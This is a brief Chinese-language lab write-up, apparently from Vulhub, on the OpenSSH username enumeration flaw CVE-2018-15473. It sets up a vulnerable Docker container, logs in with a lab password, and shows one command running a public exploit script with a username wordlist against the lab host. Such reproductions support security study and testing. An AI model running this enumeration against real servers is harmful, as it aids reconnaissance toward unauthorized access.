OpenSSH 用户名枚举漏洞(CVE-2018-15473)
OpenSSH 用户名枚举漏洞(CVE-2018-15473)
OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。
漏洞环境
执行如下命令,编译及启动一个运行OpenSSH 7.7p1的容器:
docker-compose build
docker-compose up -d
环境启动后,我们在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@172.168.30.190 -p20022
,输入密码vulhub
,即可登录到容器中。
漏洞复现
使用CVE-2018-15473-Exploit,枚举字典中的用户名:
python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt 172.168.30.190
参考
[2] https://vulhub.org/#/environments/openssh/CVE-2018-15473/